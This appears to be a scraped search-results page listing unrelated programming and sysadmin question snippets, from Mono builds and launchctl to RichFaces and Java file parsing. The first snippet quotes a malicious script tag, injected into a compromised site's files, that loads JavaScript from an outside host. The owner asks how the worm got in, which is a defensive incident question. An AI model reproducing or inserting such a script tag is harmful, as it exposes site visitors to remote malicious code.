Search Results

Search found 47655 results on 1907 pages for 'system restore'.

Page 472/1907 | < Previous Page | 468 469 470 471 472 473 474 475 476 477 478 479  | Next Page >

  • JS Worm : how to find the entry point

    - by Cédric Girard
    Hi, my site is tagged as dangerous by Google / StopBadware.org, and I found this in severals js/html files : <script type="text/javascript" src="http://oployau.fancountblogger.com:8080/Gigahertz.js"></script> <!--a0e2c33acd6c12bdc9e3f3ba50c98197--> I cleaned severals files, I restore a backup but how to understand how the worm had been installed? What can I look for in log files? This server, a Centos 5, is only used as an apache server, with ours programs, a tikiwiki, a drupal installed. Thanks Cédric

    Read the article

  • building mono from svn - android target

    - by Jeremy Bell
    There were patches made to mono on trunk svn to support android. My understanding is that essentially instead of Koush's system which builds mono using the android NDK build system directly, these patches add support for the android NDK using the regular mono configure.sh process. I'd like to play around with this patch, but not being an expert in the mono build system, I have no idea how to tell it to target the android NDK, or even where to look. I've been able to build mono from SVN using the default target (linux) on Ubuntu, but no documentation on how to target android was given with the patches. Since anyone not submitting or reviewing a patch is generally ignored on the mono mailing list, I figured I'd post the question here.

    Read the article

  • Make a Phone ring from BASH through a HUAWEI e220

    - by microspino
    Hello, I have a Debian Linux system with a HUAWEI e220 on /dev/ttyUSB0. I'd like to make It ring a generic GSM phone for just one time. I'm doing this because I'd like to build an embedded system that fires some special behavior by a single GSM phone ring. How can I do It? I've tried wvdial but I receive always a "NO CARRIER" answer when I try to send It an "ATDT XXX-phone-number-to-dial-XXX" command.

    Read the article

  • missing entry in launchctl after restart

    - by Nobik
    I have a deamon which is registered with launchctl to run as system-wide-daemon and to load automatically with every system startup or if the daemon crashes. I have registered this daemon with: sudo launchctl load -w /Library/LaunchDaemons/plist.file Everything works fine. My daemon is registered and with sudo launchctl list I can find the entry at launchctl But on some Macs after the user restarts the system, my daemon is not running. And with the command sudo launchctl list I can't find the entry anymore. Any ideas, why the entry is missing???

    Read the article

  • iphone build error that makes me want to buy a nail gun

    - by sol
    I'm just trying to build a simple update (which I have done before) for an iphone app, but now for some reason I'm getting this error. Can anyone tell me what it means? Command/Developer/Library/Xcode/Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/copyplist failed with exit code 127 sh: plutil: command not found Here are the Build Results: CopyPNGFile /Users/me/path/build/Dist-iphoneos/MyApp.app/img_000.png images/img_000.png cd /Users/me/ setenv COPY_COMMAND /Developer/Library/PrivateFrameworks/DevToolsCore.framework/Resources/pbxcp setenv PATH "/Developer/Platforms/iPhoneOS.platform/Developer/usr/bin:/Developer/usr/bin:/System/Library/Frameworks/JavaVM.frameworK/Versions/1.6/Home/" "/Developer/Platforms/iPhoneOS.platform/Developer/Library/Xcode/Plug-ins/iPhoneOS Build System Support.xcplugin/Contents/Resources/copypng" -compress "" /Users/path/images/img_000.png /Users/me/path/build/Dist-iphoneos/MyApp.app/img_000.png sh: dirname: command not found CopyPlistFile /Users/me/path/build/Dist-iphoneos/MyApp.app/Entitlements.plist Entitlements.plist cd /Users/me/ setenv PATH "/Developer/Platforms/iPhoneOS.platform/Developer/usr/bin:/Developer/usr/bin:/System/Library/Frameworks/JavaVM.frameworK/Versions/1.6/Home/" /Developer/Library/Xcode/Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/copyplist --convert binary1 Entitlements.plist --outdir /Users/me/path/build/Dist-iphoneos/MyApp.app sh: plutil: command not found

    Read the article

  • Problem with running c# application on another PC

    - by draghia-aurelian
    I wrote a Windows Form Application in C# and it works well for my computer. But on another PC, an error occurs when i try to do some stuff. code 1 private void rUNToolStripMenuItem_Click(object sender, EventArgs e) { MessageBox.Show("I'm in rUNToolStripMenuItem_Click!"); ... } code 2 private void dataPositionToolStripMenuItem_Click(object sender, EventArgs e) { MessageBox.Show("I'm in dataPositionToolStripMenuItem_Click!"); ... } Running on my computer: code1: MessageBox appears! code2: MessageBox appears! Running on another computer: code1: MessageBox doesn't appear and the error happens! code2: MessageBox appears! The error is: Method not found: "Void Microsoft.CSharp.RuntimeBinder.CSharpGetMemberBider..ctor(System.String.System.Type, System.Collections.Generic.IEnumerable'1)'. This is the PrintScreen with error: Please help me to solve the problem!

    Read the article

  • Chrome "New Tab Page" not showing most frequently visited pages

    - by Ian Boyd
    Google Chrome's*New Tab Page* is not populating the most frequented visted sites grid with anything: It's been sitting like that1 for months. My work machine populates them fine. Edit: Google Chrome Version 4.0.249.892 Edit 2: (Possibly related) Chrome is not storing any history 1i even tried clicking Restore all removed thumbnails 2Updated to 4.0.249.89 just now. Previous build was 78.

    Read the article

  • What is the Worst Depiction of Computer Use in a Movie

    - by Robert Cartaino
    You know the type: "It's a Unix system. I know this" -- in Jurassic park where a computer-genius girl sees a computer and quickly takes over like a 3-D video game, flying through the file system to shut down the park. [video link to the scene] So what's your favorite movie gaff that shows Hollywood can be completely clueless when it comes to portraying technology?

    Read the article

  • Problem regarding listShuttle component in richFaces ?

    - by Hari
    I am a newbee for Richfaces components, When i am using the <rich:listShuttle> the Arraylist specified in the targetValue is now getting updated with the latest data? Kindly help MyJSF File <a4j:region> <rich:listShuttle sourceValue="#{bean.selectItems}" id="one" targetValue="#{bean.selectItemsone}" var="items" listsHeight="150" sourceListWidth="130" targetListWidth="130" sourceCaptionLabel="Intial Items" targetCaptionLabel="Selected Items" converter="Listconverter"> <rich:column> <h:outputText value="#{items.value}"></h:outputText> </rich:column> </rich:listShuttle> </a4j:region> <a4j:region> <a4j:commandButton value="Submit" action="#{bean.action}" /> </a4j:region> My Managed Bean enter code here private List<String> selectedData; private List<BeanItems> selectItems; private List<BeanItems> selectItemsone; public String action() { System.out.println(selectItems); System.out.println(selectItemsone); System.out.println("Select Item List"); Iterator<BeanItems> iterator = selectItems.iterator(); while (iterator.hasNext()) { BeanItems item = (BeanItems) iterator.next(); System.out.println(item.getValue()); } System.out.println("/nSelect Item one list "); Iterator<BeanItems> iterator2 = selectItemsone.iterator(); while (iterator2.hasNext()) { BeanItems item = (BeanItems) iterator2.next(); System.out.println(item.getValue()); } return ""; } public void setSelectedData(List<String> selectedData) { this.selectedData = selectedData; } public List<String> getSelectedData() { return selectedData; } /** * @return the selectItems */ public List<BeanItems> getSelectItems() { if (selectItems == null) { selectItems = new ArrayList<BeanItems>(); selectItems.add(new BeanItems("value4", "label4")); selectItems.add(new BeanItems("value5", "label5")); selectItems.add(new BeanItems("value6", "label6")); selectItems.add(new BeanItems("value7", "label7")); selectItems.add(new BeanItems("value8", "label8")); selectItems.add(new BeanItems("value9", "label9")); selectItems.add(new BeanItems("value10", "label10")); } return selectItems; } /** * @return the selectItemsone */ public List<BeanItems> getSelectItemsone() { if (selectItemsone == null) { selectItemsone = new ArrayList<BeanItems>(); selectItemsone.add(new BeanItems("value1", "label1")); selectItemsone.add(new BeanItems("value2", "label2")); selectItemsone.add(new BeanItems("value3", "label3")); } return selectItemsone; } My Converter Class enter code here public Object getAsObject(FacesContext context, UIComponent component,String value) { int index = value.indexOf(':'); return new BeanItems(value.substring(0, index), value.substring(index + 1)); } public String getAsString(FacesContext context, UIComponent component,Object value) { BeanItems beanItems = (BeanItems) value; return beanItems.getValue() + ":" + beanItems.getData(); } My BeanItems Class enter code here private String data; //Getter & setter private String value; //Getter & setter public BeanItems() { } public BeanItems(String value, String data) { this.value = value; this.data = data; } public int hashCode() { final int prime = 31; int result = 1; result = prime * result + ((data == null) ? 0 : data.hashCode()); result = prime * result + ((value == null) ? 0 : value.hashCode()); return result; } public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (getClass() != obj.getClass()) return false; final BeanItems other = (BeanItems) obj; if (data == null) { if (other.data != null) return false; } else if (!data.equals(other.data)) return false; if (value == null) { if (other.value != null) return false; } else if (!value.equals(other.value)) return false; return true; }

    Read the article

  • NDepend: How to not display 'tier' assemblies in dependency graph?

    - by Edward Buatois
    I was able to do this in an earlier version of nDepend by going to tools-options and setting which assemblies would be part of the analysis (and ignore the rest). The latest version of the trial version of nDepend lets me set it, but it seems to ignore the setting and always analyze all assemblies whether I want it to or not. I tried to delete the "tier" assemblies by moving them over to the "application assemblies" list, but when I delete them out of there, they just get added back to the "tier" list, which I can't ignore. I don't want my dependency graph to contain assemblies like "system," "system.xml," and "system.serialization!" I want only MY assemblies in the dependency graph! Or is that a paid-version feature now? Is there a way to do what I'm talking about?

    Read the article

  • Linking IronPython to WPF

    - by DonnyD
    I just installed VS2010 and the great new IronPython Tools extension. Currently this extension doesn't yet generate event handlers in code upon double-clicking wpf visual controls. Is there anyone that can provide or point me to an example as to how to code wpf event handlers manually in python. I've had no luck finding any and I am new to visual studio. Upon generating a new ipython wpf project the auto-generated code is: import clr clr.AddReference('PresentationFramework') from System.Windows.Markup import XamlReader from System.Windows import Application from System.IO import FileStream, FileMode app = Application() app.Run(XamlReader.Load(FileStream('WpfApplication7.xaml', FileMode.Open))) and the XAML is: <Window xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" Title="WpfApplication7" Height="300" Width="300"> <Button>Click Me</Button> </Window> Any help would be appreciated.

    Read the article

  • how can I save the layout of my open apps on osx?

    - by fad
    I'd like to save the position and size of my open apps and restore them later (after restart). I found an applescript that does this with finder windows only: http://hubionmac.com/wordpress/2008/09/finder-fenster-position-und-layout-speichern/ (german) Maybe I could adept it, but I can't believe there's no application for this.

    Read the article

  • Measuring device drivers CPU/IO utilization caused by my program

    - by Lior Kogan
    Sometimes code can utilize device drivers up to the point where the system is unresponsive. Lately I've optimized a WIN32/VC++ code which made the system almost unresponsive. The CPU usage, however, was very low. The reason was 1000's of creations and destruction of GDI objects (pens, brushes, etc.). Once I refactored the code to create all objects only once - the system became responsive again. This leads me to the question: Is there a way to measure CPU/IO usage of device drivers (GPU/disk/etc) for a given program / function / line of code?

    Read the article

  • extend web server to serve static files

    - by Turtle
    Hello, I want to extend a web server which is only able to handle RPC handling now. The web server is written in C#. It provides a abstract handler function like following: public string owsHandler(string request, string path, string param, OSHttpRequest httpRequest, OSHttpResponse httpResponse) And I wrote following code to handle image files: Bitmap queryImg = new Bitmap(path); System.IO.MemoryStream stream = new System.IO.MemoryStream(); queryImg.Save(stream, System.Drawing.Imaging.ImageFormat.Bmp); queryImg.Dispose(); byte[] byteImage = stream.ToArray(); stream.Dispose(); return Convert.ToBase64String(byteImage); And I test it in the browser, the image is returned but the image dimension info is missed. Shall I add something more to the code? Or is any general way to server static files? I do not want to serve it in a ASP.net server. Thanks

    Read the article

  • SSH Advanced Logging

    - by Radek Šimko
    I've installed OpenSUSE on my server and want to set ssh to log every command, which is send to system over it. I've found this in my sshd_config: # Logging # obsoletes QuietMode and FascistLogging #SyslogFacility AUTH #LogLevel INFO I guess that both of those directives has to be uncommented, but I'd like to log every command, not only authorization (login/logout via SSH). I just want to know, if someone breaks into my system, what did he do.

    Read the article

  • MSSQL Search Proper Names Full Text Index vs LIKE + SOUNDEX

    - by Matthew Talbert
    I have a database of names of people that has (currently) 35 million rows. I need to know what is the best method for quickly searching these names. The current system (not designed by me), simply has the first and last name columns indexed and uses "LIKE" queries with the additional option of using SOUNDEX (though I'm not sure this is actually used much). Performance has always been a problem with this system, and so currently the searches are limited to 200 results (which still takes too long to run). So, I have a few questions: Does full text index work well for proper names? If so, what is the best way to query proper names? (CONTAINS, FREETEXT, etc) Is there some other system (like Lucene.net) that would be better? Just for reference, I'm using Fluent NHibernate for data access, so methods that work will with that will be preferred. I'm using MS SQL 2008 currently.

    Read the article

  • Enable access for assistive device programmatically

    - by Dheeraj
    Hi All, I want to enable Access for assistive devices in System Preferences programmatically. But Problem is that my application is not running as root user and i do not want my application to be as root user and also should not ask for any authentication in between. I want to tap all keyboard events globally. I am using CGEventTapCreate() for the same.In the documentation of CGEventTapCreate() API it is mentioned that, Event taps receive key up and key down events if one of the following conditions is true: The current process is running as the root user. Access for assistive devices is enabled. In Mac OS X v10.4 & later, you can enable this feature using System Preferences, Universal Access panel, Keyboard view. I tried manually by checking the Enable Access for assistive devices from System Preference and it gives me expected output. So is there any way to do the same via program without asking for authentication and also application is not running as root user? Thanks, Dheeraj.

    Read the article

  • C# Winform : Deployment Problem after using DataRepeater of MS Visual Basics power pack

    - by Mohsan
    hi. Microsoft Visual Studio 2008 Service pack 1 comes with Visual Basic Powerpacks which has the DataRepeater control. I used this control in my c# winform application. in my system everything is running fine. now i copied the debug folder to other system which has only .Net Framework 3.5 SP1 installed. in this system is giving me error cannot load dependency Microsoft.VisualBasic.PowerPacks.dll even i set the Copy Local to "true" for "Microsoft.VisualBasic.dll" and "Microsoft.VisualBasic.PowerPacks.Vs.dll" please tell me how to solve this problem

    Read the article

  • Location of the fonts on the iPhone?

    - by Kyle
    I'm using the FreeType2 library in an iPhone project, and I'm trying to simply load a TTF file from the system, if possible. FT_Library library; FT_Face face; int error; error = FT_Init_FreeType( &library ); if ( error == 0 ) printf("Initialized FreeType2\r\n"); /* Prints */ error = FT_New_Face(library, "/System/Library/Fonts/Helvetica.ttf", 0, &face); if ( error == FT_Err_Cannot_Open_Resource ) printf("Font not found\r\n"); /* Prints */ That error seems to be for file not found. Is /System/Library/Fonts not the location of the fonts? Or, do iPhone apps simply not have any read access at all to that directory. Thanks!

    Read the article

  • Networking: Adding specific route for printer, on Mac Connected to Two Networks

    - by Jordan
    I have a Mac connected to two different networks (wireless en1 and ethernet en0 ). The ethernet network is the preferred (System Preferences-Set Service Order). I'd like to be able to print to a printer on the wireless network side, without having to go to System Preferences and make the wireless network come first in the service order. Is there a way to add a route for a specific printer?

    Read the article

  • Deployment Problem after using DataRepeater of MS Visual Bacis power pack

    - by Mohsan
    hi. Microsoft Visual Studio 2008 Service pack 1 comes with Visual Basic Powerpacks which has the DataRepeater control. I used this control in my c# winform application. in my system everything is running fine. now i copied the debug folder to other system which has only .Net Framework 3.5 SP1 installed. in this system is giving me error cannot load dependency Microsoft.VisualBasic.PowerPacks.dll even i set the Copy Local to "true" for "Microsoft.VisualBasic.dll" and "Microsoft.VisualBasic.PowerPacks.Vs.dll" please tell me how to solve this problem

    Read the article

  • Adding the domain account to a security group on the SQL Server computer that has sufficient privileges to log on as a service

    - by Alberto
    After reading this article, http://www.red-gate.com/supportcenter/content/knowledgebase/SQL_Backup/KB200710000173 I have some problems configuring point 2) and 3): 2) Create a SQL Server login that has the ability to backup (and restore) databases (y) by adding it to the SYSADMIN server role. 3) Add the domain account (x) to a security group on the SQL Server computer that has sufficient privileges to log on as a service, etc. Where can I find detailed instructions on how to accomplish them? Thanks.

    Read the article

  • How to take a screenshot with Mono C#?

    - by vagabond
    I'm trying to use use code get a screenshot in Mono C# but I'm getting a System.NotImplementedException when I call CopyFromScreen. My code works with .NET, so is there an alternate way of getting a screenshot using Mono? Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height); Graphics graphics = Graphics.FromImage(bitmap as Image); graphics.CopyFromScreen(0, 0, 0, 0, bitmap.Size); System.IO.MemoryStream memoryStream = new System.IO.MemoryStream(); bitmap.Save(memoryStream, imageFormat); bitmap.Save(@"\tmp\screenshot.png", ImageFormat.Png); I am using Mono JIT compiler version 2.4.2.3 (Debian 2.4.2.3+dfsg-2)

    Read the article

  • Parse a text file into multiple text file

    - by Vijay Kumar Singh
    I want to get multiple file by parsing a input file Through Java. The Input file contains many fasta format of thousands of protein sequence and I want to generate raw format(i.e., without any comma semicolon and without any extra symbol like "", "[", "]" etc) of each protein sequence. A fasta sequence starts form "" symbol followed by description of protein and then sequence of protein. For example ? lcl|NC_000001.10_cdsid_XP_003403591.1 [gene=LOC100652771] [protein=hypothetical protein LOC100652771] [protein_id=XP_003403591.1] [location=join(12190..12227,12595..12721,13403..13639)] MSESINFSHNLGQLLSPPRCVVMPGMPFPSIRSPELQKTTADLDHTLVSVPSVAESLHHPEITFLTAFCL PSFTRSRPLPDRQLHHCLALCPSFALPAGDGVCHGPGLQGSCYKGETQESVESRVLPGPRHRH Like above formate the input file contains 1000s of protein sequence. I have to generate thousands of raw file containing only individual protein sequence without any special symbol or gaps. I have developed the code for it in Java but out put is : Cannot open a file followed by cannot find file. Please help me to solve my problem. Regards Vijay Kumar Garg Varanasi Bharat (India) The code is /*Java code to convert FASTA format to a raw format*/ import java.io.*; import java.util.*; import java.util.regex.*; import java.io.FileInputStream; // java package for using regular expression public class Arrayren { public static void main(String args[]) throws IOException { String a[]=new String[1000]; String b[][] =new String[1000][1000]; /*open the id file*/ try { File f = new File ("input.txt"); //opening the text document containing genbank ids FileInputStream fis = new FileInputStream("input.txt"); //Reading the file contents through inputstream BufferedInputStream bis = new BufferedInputStream(fis); // Writing the contents to a buffered stream DataInputStream dis = new DataInputStream(bis); //Method for reading Java Standard data types String inputline; String line; String separator = System.getProperty("line.separator"); // reads a line till next line operator is found int i=0; while ((inputline=dis.readLine()) != null) { i++; a[i]=inputline; a[i]=a[i].replaceAll(separator,""); //replaces unwanted patterns like /n with space a[i]=a[i].trim(); // trims out if any space is available a[i]=a[i]+".txt"; //takes the file name into an array try // to handle run time error /*take the sequence in to an array*/ { BufferedReader in = new BufferedReader (new FileReader(a[i])); String inline = null; int j=0; while((inline=in.readLine()) != null) { j++; b[i][j]=inline; Pattern q=Pattern.compile(">"); //Compiling the regular expression Matcher n=q.matcher(inline); //creates the matcher for the above pattern if(n.find()) { /*appending the comment line*/ b[i][j]=b[i][j].replaceAll(">gi",""); //identify the pattern and replace it with a space b[i][j]=b[i][j].replaceAll("[a-zA-Z]",""); b[i][j]=b[i][j].replaceAll("|",""); b[i][j]=b[i][j].replaceAll("\\d{1,15}",""); b[i][j]=b[i][j].replaceAll(".",""); b[i][j]=b[i][j].replaceAll("_",""); b[i][j]=b[i][j].replaceAll("\\(",""); b[i][j]=b[i][j].replaceAll("\\)",""); } /*printing the sequence in to a text file*/ b[i][j]=b[i][j].replaceAll(separator,""); b[i][j]=b[i][j].trim(); // trims out if any space is available File create = new File(inputline+"R.txt"); try { if(!create.exists()) { create.createNewFile(); // creates a new file } else { System.out.println("file already exists"); } } catch(IOException e) // to catch the exception and print the error if cannot open a file { System.err.println("cannot create a file"); } BufferedWriter outt = new BufferedWriter(new FileWriter(inputline+"R.txt", true)); outt.write(b[i][j]); // printing the contents to a text file outt.close(); // closing the text file System.out.println(b[i][j]); } } catch(Exception e) { System.out.println("cannot open a file"); } } } catch(Exception ex) // catch the exception and prints the error if cannot find file { System.out.println("cannot find file "); } } } If you provide me correct it will be much easier to understand.

    Read the article

< Previous Page | 468 469 470 471 472 473 474 475 476 477 478 479  | Next Page >